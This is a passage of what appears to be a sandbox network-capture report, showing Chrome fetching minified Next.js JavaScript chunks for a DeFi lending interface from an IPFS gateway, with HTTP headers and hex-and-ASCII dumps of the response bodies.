                                                                                                                                                                                                                                                  Data Ascii: sabled,g=e.disableInput,O=e.onSelect,C=e.assets,E=e.capType,I=e.maxValue,P=e.isMaxSelected,L=e.inputTitle,R=e.balanceText,Z=e.loading,D=void 0!==Z&&Z,B=e.event,M=e.selectOptionHeader,N=e.selectOption,W=e.sx,_=void 0===W?{}:W,U=e.exchangeRateComponent,q=(0
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 73 65 63 6f 6e 64 61 72 79 22 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 26 26 6f 28 22 22 29 7d 2c 64 69 73 61 62 6c 65 64 3a 62 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 53 2e 6a 73 78 29 28 73 2e 5a 2c 7b 68 65 69 67 68 74 3a 31 36 7d 29 7d 29 2c 4f 26 26 31 21 3d 3d 43 2e 6c 65 6e 67 74 68 3f 28 30 2c 53 2e 6a 73 78 29 28 6d 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 53 2e 6a 73 78 73 29 28 66 2e 5a 2c 7b 64 69 73 61 62 6c 65 64 3a 62 2c 76 61 6c 75 65 3a 46 2e 73 79 6d 62 6f 6c 2c 6f 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 43 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 73 79 6d 62 6f 6c 3d 3d 3d 65 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 7d 29 29
                                                                                                                                                                                                                                                  Data Ascii: secondary"}},onClick:function(){o&&o("")},disabled:b,children:(0,S.jsx)(s.Z,{height:16})}),O&&1!==C.length?(0,S.jsx)(m.Z,{children:(0,S.jsxs)(f.Z,{disabled:b,value:F.symbol,onChange:function(e){var t=C.find((function(t){return t.symbol===e.target.value}))
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 69 63 6f 6e 53 79 6d 62 6f 6c 7c 7c 65 2e 73 79 6d 62 6f 6c 2c 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 32 70 78 22 2c 6d 72 3a 31 7d 7d 29 2c 28 30 2c 53 2e 6a 73 78 29 28 76 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 36 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 73 79 6d 62 6f 6c 7d 29 2c 65 2e 62 61 6c 61 6e 63 65 26 26 28 30 2c 53 2e 6a 73 78 29 28 6a 2e 42 2c 7b 76 61 6c 75 65 3a 65 2e 62 61 6c 61 6e 63 65 2c 63 6f 6d 70 61 63 74 3a 21 30 7d 29 5d 7d 29 7d 2c 65 2e 73 79 6d 62 6f 6c 29 7d 29 29 5d 7d 29 7d 29 3a 28 30 2c 53 2e 6a 73 78 73 29 28 6c 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 53 2e 6a 73 78 29 28 6b
                                                                                                                                                                                                                                                  Data Ascii: iconSymbol||e.symbol,sx:{fontSize:"22px",mr:1}}),(0,S.jsx)(v.Z,{sx:{mr:6},children:e.symbol}),e.balance&&(0,S.jsx)(j.B,{value:e.balance,compact:!0})]})},e.symbol)}))]})}):(0,S.jsxs)(l.Z,{sx:{display:"inline-flex",alignItems:"center"},children:[(0,S.jsx)(k


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  27192.168.2.549739209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC504OUTGET /_next/static/chunks/1320.f9a83bb87b7294af.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 11915
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiahj2zwjt27sx6onqvzhnj6n2dgg7uqyk6jr7xpcjsrjybubtx6fy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1320.f9a83bb87b7294af.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiahj2zwjt27sx6onqvzhnj6n2dgg7uqyk6jr7xpcjsrjybubtx6fy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 643336
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 34 36 39 39 33 38 63 36 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41469938c6b-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 32 30 5d 2c 7b 39 36 38 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 37 33 30 29 2c 6f 3d 72 28 34 39 35 30 31 29 2c 63 3d 72 28 31 32 37 39 29 2c 73 3d 72 28 36 32 30 39 37 29 2c 61 3d 72 28 33 30 31 32 30 29 2c 6c 3d 72 28 32 39 36 33 30 29 2c 64 3d 72 28 37 35 30 38 34 29 2c 78 3d 72 28 37 30 37 39 34 29 2c 75 3d 72 28 34 31 30 32 34 29 2c 70 3d 72 28 38 35 38 39 33 29 2c 6a
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1320],{96875:function(e,n,r){r.d(n,{o:function(){return m}});var t=r(59499),i=r(4730),o=r(49501),c=r(1279),s=r(62097),a=r(30120),l=r(29630),d=r(75084),x=r(70794),u=r(41024),p=r(85893),j
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 34 22 2c 63 6f 6c 6f 72 3a 6d 2e 73 75 63 63 65 73 73 2e 6d 61 69 6e 2c 63 68 69 6c 64 72 65 6e 3a 22 5c 75 32 32 31 65 22 7d 29 3a 28 30 2c 70 2e 6a 73 78 29 28 75 2e 42 2c 68 28 7b 76 61 6c 75 65 3a 76 2c 73 78 3a 68 28 7b 63 6f 6c 6f 72 3a 79 7d 2c 66 2e 73 78 29 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 63 6f 6d 70 61 63 74 3a 21 30 7d 2c 66 29 29 2c 72 26 26 28 30 2c 70 2e 6a 73 78 29 28 64 2e 5a 2c 7b 6f 6e 43 6c 69 63 6b 3a 72 2c 76 61 72 69 61 6e 74 3a 22 73 75 72 66 61 63 65 22 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 2c 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a
                                                                                                                                                                                                                                                  Data Ascii: variant:"secondary14",color:m.success.main,children:"\u221e"}):(0,p.jsx)(u.B,h({value:v,sx:h({color:y},f.sx),visibleDecimals:2,compact:!0},f)),r&&(0,p.jsx)(d.Z,{onClick:r,variant:"surface",size:"small",sx:{minWidth:"unset",ml:{xs:0,xsm:2}},children:(0,p.j
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 73 3a 7b 73 79 6d 62 6f 6c 3a 74 7d 7d 29 7d 29 2c 28 30 2c 68 2e 6a 73 78 73 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 77 69 64 74 68 3a 22 31 30 30 25 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 6e 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 68 2e 6a 73 78 29 28 66 2e 58 2c 7b 68 65 69 67 68 74 3a 33 32 2c 63 61 70 74 69 6f 6e 3a 28 30 2c 68 2e 6a 73 78 73 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6d 62 3a 6e 2e 6c 65 6e 67 74 68 3e 31 3f 32 3a 30 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 68 2e 6a 73 78 29 28 70 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 2c 73 78 3a 7b 66 6f 6e 74 53
                                                                                                                                                                                                                                                  Data Ascii: s:{symbol:t}})}),(0,h.jsxs)(o.Z,{sx:{width:"100%"},children:[n.map((function(e){return(0,h.jsx)(f.X,{height:32,caption:(0,h.jsxs)(o.Z,{sx:{display:"flex",alignItems:"center",mb:n.length>1?2:0},children:[(0,h.jsx)(p.T1,{symbol:e.rewardTokenSymbol,sx:{fontS
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 69 76 65 73 4e 65 74 41 50 52 3a 5a 2c 73 79 6d 62 6f 6c 3a 72 7d 29 2c 77 69 74 68 6f 75 74 48 6f 76 65 72 3a 21 30 2c 73 65 74 4f 70 65 6e 3a 62 2c 6f 70 65 6e 3a 79 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 68 2e 6a 73 78 73 29 28 6f 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 70 3a 7b 78 73 3a 22 30 20 34 70 78 22 2c 78 73 6d 3a 22 32 70 78 20 34 70 78 22 7d 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 79 3f 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 3a 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65
                                                                                                                                                                                                                                                  Data Ascii: ivesNetAPR:Z,symbol:r}),withoutHover:!0,setOpen:b,open:y,children:(0,h.jsxs)(o.Z,{sx:function(e){return{p:{xs:"0 4px",xsm:"2px 4px"},border:"1px solid ".concat(y?e.palette.action.disabled:e.palette.divider),borderRadius:"4px",cursor:"pointer",display:"fle
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 72 3a 22 63 6f 6d 6d 6f 6e 2e 77 68 69 74 65 22 2c 63 6f 6c 6f 72 3a 22 63 6f 6d 6d 6f 6e 2e 62 6c 61 63 6b 22 2c 6d 6c 3a 2d 31 2c 7a 49 6e 64 65 78 3a 35 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 68 2e 6a 73 78 29 28 69 2e 5a 2c 7b 7d 29 7d 29 5d 7d 29 7d 29 7d 29 5d 7d 29 7d 29 7d 7d 2c 34 34 37 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 43 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 2c 72 24 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 2c 61 39 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 39 35 30 31 29 2c 6f 3d 72 28 33 38 32 36 34 29 2c 63 3d 72 28 38 31 36 34 35 29 2c 73 3d 72 28 36 32 30
                                                                                                                                                                                                                                                  Data Ascii: r:"common.white",color:"common.black",ml:-1,zIndex:5},children:(0,h.jsx)(i.Z,{})})]})})})]})})}},44749:function(e,n,r){r.d(n,{Ch:function(){return m},r$:function(){return v},a9:function(){return y}});var t=r(59499),i=r(49501),o=r(38264),c=r(81645),s=r(620
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 49 73 6f 6c 61 74 65 64 20 61 73 73 65 74 73 20 68 61 76 65 20 6c 69 6d 69 74 65 64 20 62 6f 72 72 6f 77 69 6e 67 20 70 6f 77 65 72 20 61 6e 64 20 6f 74 68 65 72 20 61 73 73 65 74 73 20 63 61 6e 6e 6f 74 20 62 65 20 75 73 65 64 20 61 73 20 63 6f 6c 6c 61 74 65 72 61 6c 2e 22 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 75 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 74 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 75 2e 6a 73 78 29 28 6c 2e 5a 2c 6a 28 6a 28 7b 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 73 78 3a 7b 6c 69 6e 65 48 65 69 67 68 74 3a 22 30 2e 37 35 72 65 6d 22 7d 2c 63 6f 6c 6f 72 3a 72 2e 70 61 6c 65 74 74 65 2e 77 61 72 6e 69 6e 67 2e 6d 61 69 6e 7d 2c 6e 29 2c 7b 7d 2c
                                                                                                                                                                                                                                                  Data Ascii: jsx)(i.cC,{id:"Isolated assets have limited borrowing power and other assets cannot be used as collateral."})}),children:(0,u.jsxs)(a.Z,{sx:t,children:[(0,u.jsx)(l.Z,j(j({variant:"secondary12",sx:{lineHeight:"0.75rem"},color:r.palette.warning.main},n),{},
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 61 74 69 6f 6e 2d 6d 6f 64 65 22 2c 66 6f 6e 74 57 65 69 67 68 74 3a 35 30 30 7d 29 7d 7d 29 7d 29 5d 7d 29 7d 7d 2c 39 32 33 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 7d 7d 29 3b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 37 33 30 29 2c 6f 3d 72 28 33 30 31 32 30 29 2c 63 3d 72 28 32 39 36 33 30 29 2c 73 3d 72 28 38 35 38 39 33 29 2c 61 3d 5b 22 63 61 70 74 69 6f 6e 22 2c 22 63 68 69 6c 64 72 65 6e 22 2c 22 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 22 2c 22 63 61 70 74 69 6f 6e 43 6f 6c 6f 72 22 2c 22 61 6c 69 67 6e 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 6e 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66
                                                                                                                                                                                                                                                  Data Ascii: ation-mode",fontWeight:500})}})})]})}},92391:function(e,n,r){r.d(n,{X:function(){return x}});var t=r(59499),i=r(4730),o=r(30120),c=r(29630),s=r(85893),a=["caption","children","captionVariant","captionColor","align"];function l(e,n){var r=Object.keys(e);if
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 73 78 29 28 69 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 6e 2e 65 72 72 6f 72 3f 28 30 2c 73 2e 6a 73 78 73 29 28 73 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 6e 2e 65 72 72 6f 72 2c 22 20 22 2c 28 30 2c 73 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3a 22 74 6f 70 22 7d 2c 76 61 72 69 61 6e 74 3a 22 74 65 78 74 22 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 61 76 69 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 77 72 69 74 65 54 65 78 74 28 6e 2e 72 61 77 45 72 72 6f 72 2e 6d 65 73 73 61 67 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28
                                                                                                                                                                                                                                                  Data Ascii: sx)(i.Z,{variant:"description",children:n.error?(0,s.jsxs)(s.Fragment,{children:[n.error," ",(0,s.jsx)(o.Z,{sx:{verticalAlign:"top"},variant:"text",onClick:function(){return navigator.clipboard.writeText(n.rawError.message.toString())},children:(0,s.jsx)(
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1027INData Raw: 72 65 74 75 72 6e 20 65 7d 76 61 72 20 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 6e 65 74 77 6f 72 6b 4e 61 6d 65 2c 72 3d 65 2e 63 68 61 69 6e 49 64 2c 74 3d 65 2e 65 76 65 6e 74 2c 75 3d 65 2e 66 75 6e 6e 65 6c 2c 6a 3d 28 30 2c 73 2e 5a 29 28 29 2c 66 3d 6a 2e 73 77 69 74 63 68 4e 65 74 77 6f 72 6b 2c 68 3d 6a 2e 73 77 69 74 63 68 4e 65 74 77 6f 72 6b 45 72 72 6f 72 2c 6d 3d 28 30 2c 61 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 78 2e 6a 73 78 29 28 64 2e 76 2c 7b 73 65 76 65 72 69 74 79 3a 22 65 72 72 6f 72 22 2c 69 63 6f 6e 3a 21 31 2c 63 68 69 6c 64 72 65 6e 3a 68 3f 28 30 2c 78 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 63 68 69 6c
                                                                                                                                                                                                                                                  Data Ascii: return e}var j=function(e){var n=e.networkName,r=e.chainId,t=e.event,u=e.funnel,j=(0,s.Z)(),f=j.switchNetwork,h=j.switchNetworkError,m=(0,a.Y)((function(e){return e.trackEvent}));return(0,x.jsx)(d.v,{severity:"error",icon:!1,children:h?(0,x.jsx)(o.Z,{chil


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  28192.168.2.549740209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC504OUTGET /_next/static/chunks/7603.58cb27010e0a12d8.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 15744
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiave5xgq6m7p4527dg3bzqvc6kb5utw5ao634gu6x5uumpyksoqaq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7603.58cb27010e0a12d8.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiave5xgq6m7p4527dg3bzqvc6kb5utw5ao634gu6x5uumpyksoqaq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028476
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 34 35 66 62 36 31 38 30 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4145fb61809-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 36 30 33 5d 2c 7b 35 37 33 33 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 6f 3d 72 28 36 37 32 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 72 65 74 75 72 6e 21 21 28 74 7c 7c 22 22 29 2e 6d 61 74 63 68 28 2f 5c 64 2f 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 2f 5b 2d 5b 5c 5d 2f 7b 7d 28 29 2a
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7603],{57333:function(t,e,r){var o=r(67294);function n(){}function a(t){return!!(t||"").match(/\d/)}function i(t){return null===t||void 0===t}function s(t){return t.replace(/[-[\]/{}()*
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 69 64 61 74 65 50 72 6f 70 73 28 29 3b 76 61 72 20 6f 3d 74 68 69 73 2e 66 6f 72 6d 61 74 56 61 6c 75 65 50 72 6f 70 28 72 29 3b 74 68 69 73 2e 73 74 61 74 65 3d 7b 76 61 6c 75 65 3a 6f 2c 6e 75 6d 41 73 53 74 72 69 6e 67 3a 74 68 69 73 2e 72 65 6d 6f 76 65 46 6f 72 6d 61 74 74 69 6e 67 28 6f 29 2c 6d 6f 75 6e 74 65 64 3a 21 31 7d 2c 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 42 65 66 6f 72 65 49 6e 70 75 74 3d 7b 73 65 6c 65 63 74 69 6f 6e 53 74 61 72 74 3a 30 2c 73 65 6c 65 63 74 69 6f 6e 45 6e 64 3a 30 7d 2c 74 68 69 73 2e 6f 6e 43 68 61 6e 67 65 3d 74 68 69 73 2e 6f 6e 43 68 61 6e 67 65 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 6f 6e 4b 65 79 44 6f 77 6e 3d 74 68 69 73 2e 6f 6e 4b 65 79 44 6f 77 6e 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69
